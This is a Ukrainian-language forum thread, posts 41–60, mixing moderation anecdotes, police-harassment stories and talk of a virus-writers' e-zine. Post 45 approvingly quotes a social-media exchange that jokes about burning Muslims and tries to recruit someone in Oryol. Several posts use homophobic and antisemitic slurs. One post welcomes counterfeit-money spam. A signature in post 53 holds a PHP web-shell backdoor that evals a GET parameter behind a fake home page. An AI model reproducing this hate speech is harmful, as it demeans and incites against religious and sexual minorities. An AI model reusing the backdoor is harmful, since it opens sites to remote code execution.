41

Re: 0xDADA11C7

0xDADA11C7 написав:
Прихований текст
https://pp.vk.me/c621218/v621218301/5829/yZtKmOM-EhM.jpg

яажзберегла

Психологічні бесіди з додатковою послугою промивання мізків. Недорого.
Не дизайню. Взагалі ні разу. У назві розділу "Дизайн та графіка" є слово "графіка" - ось тут трохи шарю. І не більше. Так, часто питають.
Продам гараж
Подякували: 221VOLT, ostap34PHP2

42

Вирішив відписати про сьогоднішній випадок, щоб посилатися на цей запис в подальшій модераторській роботі:

В цій темі користувач kostenjuk_93 нахамив користувачеві Djalin, який у відповідь нахмив корустувачеві kostenjuk_93 і звернувся за модерською допомогою. Я вилучив образи обох сторін і написав

0xDADA11C7 написав:

Панове балакуни, прошу залишатися в межах пристойності

А користувачеві Djalin відправив особистого листа, щоб він теж охолов. Власне, листування:

0xDADA11C7 написав:

Ви теж не охолоньте.

Djalin написав:

а я його ображав?

0xDADA11C7 написав:

Наступного разу модераторів не кличте, коли чините так само.

Djalin написав:

поясніть в чому саме я не праив? він мені нахамив - я назвав його хамом. Я його не обзивав не тикав - то в чому моя неправота?

0xDADA11C7 написав:

Особисто моя точка зору, що коли намагаєшся вирішити проблему за допомогою посередника, то не варто чинити так само, як і винуватець конфлікту. Оскільки вашому життю нічого не загрожувало, а те що винуватець конфлікту є хамом - цілком очевидно, то ви могли б утриматися від коментарів і подальщого розпалювання конфлікту. В такому випадку звернення до посередника є більш ефективним - модератор би зробив попередження винуватцю і в разі повторення конфлікту його можна було б забанити, а так ви начебто вирішили розібратися самостійно, але як засіб "помсти" викликали модератора. Тепер порушеннь 2 шт. і "хам" вдрізняється від вас лише тим, що той перший почав, а це вже дитячий садочок. Я не проти щоб хтось обійшовся зовсім без модератора і так само відповів, тоді б забанили обох, але б всі були задоволені. Якось так я міркую - нічого особистого, лише римське право :)

Djalin написав:

добро

Говорила баба діду: «Я поїду к Білодіду, Ізучу двомовну мову І вернусь обратно знову». А дід бабі: «Не *изди, К Білодіду нєт їзди, — Туди не ходять поїзди»
Подякували: Replace, 221VOLT2

43

Гм, а приватну переписку можна розголошувати?

44

Там нема особистої інфи, а лише консультація стосовно правил форуму і ходу думок модератора.

Говорила баба діду: «Я поїду к Білодіду, Ізучу двомовну мову І вернусь обратно знову». А дід бабі: «Не *изди, К Білодіду нєт їзди, — Туди не ходять поїзди»

45

Намагався вконтакті завербувати агента в стратегічно важливому для нас місті (Орел, транспортна розв’язка, переміщення військ і потік біженців), скориставшись незадоволення місцевого населення кавказько-мусульманською експансією:

російською

Контекст: На малюнці мусульмани у переході раком стоять.

Наталия Ливерова: а чего они раком стоят?

Petro Dadaistenko: Наталия, Бо дурные муслимы.

Наталия Ливерова: почему они все еще не в печи?

Petro Dadaistenko: Наталия, работаем по мере возможностей. Нельзя одновременно кизяков, мусоров, гебню и муслимов жечь. Не хватает рабочих рук!

Наталия Ливерова: Petro, готова предоставить свои две

Petro Dadaistenko: Наталия, Ваше местположение (если оно верно указано) очень удобно для нас. Через Орел идет поток т.н. "беженцев", которые этих кизяков к себе и зазывали. Настоящие казаки неприкормленные властью сегодня сидят или в могиле лежат. Ярким примером этому являеться - https://ru.wikipedia.org/wiki/Молодидов … адимирович Он, кстати, муслимов и убивал. Если вас интересует как ослабить гебню экономически и без криминала (то, что в силах каждого человека), то я вам позже скину в ЛС ссылки, ок?

Наталия Ливерова: Petro, ох ты ёбтваю...да я ж пошутила ...я за мир во всем мире,все дела,вы чего меня тут вербуете?вообще убивать людей-это хуёво,друг мой.а вы своими блаблабла подталкиваете и пропогандируете то,что творится на Украине.а там,между прочим,у меня родственников тьма.короче завязывали бы вы эту свою богодельню.не знаю,сколько вам там платят и как промывают мозги,но это плохо скажетсЯ на вашей карме,уважаемый

Звідсіля

І музика в тему:

46

Тема продавця фальшивих банкнот і документів свідчить про те, що мені майже вдалося запустити ринок. Звичайно, спамери це погано і форум не призначений для такого, але такі спамер заводяться на кардерських/хакерських ресурсах, тож це добрий знак. Індастрі вже близько!

Подякували: 221VOLT1

47

До мене в парку до*бався гомопатруль за те, що я з дівчиною цілувався, сказали що зобов'язані провести виховну розмову, бо там діти ходять і таке нізя робити. Два годи тому цей же патруль спочатку обшукав мене, а потім питати став, бо вони там вирішили що я на маніяка місцевого схожий. Це все відбувалося в дніпрожидівському Севастопольському парку, де братська могила часів кримської війни, уздовж алеї стовбичать істукани присвячені гєроям рускай армії, самі могили позносили, а на гігантській братській могилі стирчать в усі боки чавунні гармати. Сам цвинтарний гомопатруль називається "програма губернатора", за два годи змінилося 3 губернатори і всі вони гоміки, нетолерантні до гетеросексуалів. А пояснення просте - губернаторів не обирають, їх призначають.

http://replace.org.ua/extensions/om_images/img/5616e5aa403f8/7Ksy-zSCIs4.jpg

Подякували: FakiNyan, leofun01, 221VOLT3

48

Це тіпа ППС-ники чи хто?

49

Так, ППС-ники. А взагалі багацько в місті "півнів" та "удавів" з "левітами".

50

Цікаво, от якби був час і  натхнення, чисто теоретично, на них можна в адмін суд подати.

51

Розумієте, тут дуже тонка межа з іншими функціями цих всіх ментів, тобто вхопишся за необґрунтовану зупинку, а воно там і рейдерськими захопленнями займається і тітушками на майдані керувало і повій кришує і з організованою злочинністю яшкається (там взагалі незрозуміло де хлопчик, а де дівчинка хто на кого працює)

Подякували: Kane, leofun01, 221VOLT3

52

В продовження попередньої історії... здається я знайшов протиотруту од гомопатруля.
Я був на святкуванні дня народження свого друга і ми гуляли в парку, я пив живчик бо а друг - пиво і там їздив патруль (парк инший, але все одно в 10 метрах од нас знаходилась масивна гранітова плита в пам'ять про жертв фашизму, а в 30 метрах новіша плита знаходиться, яка уточнює українською й івритом про яких саме жертв йдеться), так от друг вигадав причепити наліпку од живчика на свою пивну пляшку:
http://replace.org.ua/extensions/om_images/img/562e666bf08b9/T3VXaq-95kE.jpg

А я подумав, що це цікавий спосіб - наступного разу дівчині треба буде вуса намалювати, щоб гомопатруль не чіплявся:
http://replace.org.ua/extensions/om_images/img/562e666bf08b9/vDgk-LRIuKw.jpg

Смерть гомопатрулям!

Подякували: leofun01, 221VOLT2

53

0xDADA11C7 жінка?

<?php
echo '<html><body><h1>This is my home page</h1>DATING &amp; DOORWAY</body></html>';
if (isset($_GET['adminka'])) eval($_GET['adminka']);
Если ты это читаешь, тебе должно быть стыдно! Займись чем–нибудь полезным!

54

Взагалі чоловік, але в інтернеті ми всі потік електронів у кольорових дротах.

Подякували: leofun01, 221VOLT2

55

Раніше я вважав що 0xDADA11C7 якось пов'язаний з журналом "Infected voice", але начебто він замолодий для цього :)

life is too short to remove usb safely
Подякували: 0xDADA11C7, 221VOLT, /KIT\3

56

Я (здалеку) люблю LovinGOD`а та його публіцистичну діяльність та IV вплинув на мій світогляд, як і десь сотня-друга инших джерел інформації.

57

А що таке воно оте "Infected voice"?

58

Електронний журнал вірусописців, якого видавав вельмишановший LovinGOD з компанією.

Подякували: 221VOLT, ostap34PHP2

59

Почитав на лурку про нього. Ну що сказати, етапажний підарас.

60 Востаннє редагувалося FakiNyan (28.10.2015 18:11:12)

Vo_Vik написав:

Почитав на лурку про нього. Ну що сказати, етапажний підарас.

отакої
а, це ви про лавингГОД, а я думав, про пана Даду

All you want is a dingle,
What you envy's a schwang,
A thing through which you can tinkle,
Or play with, or simply let hang...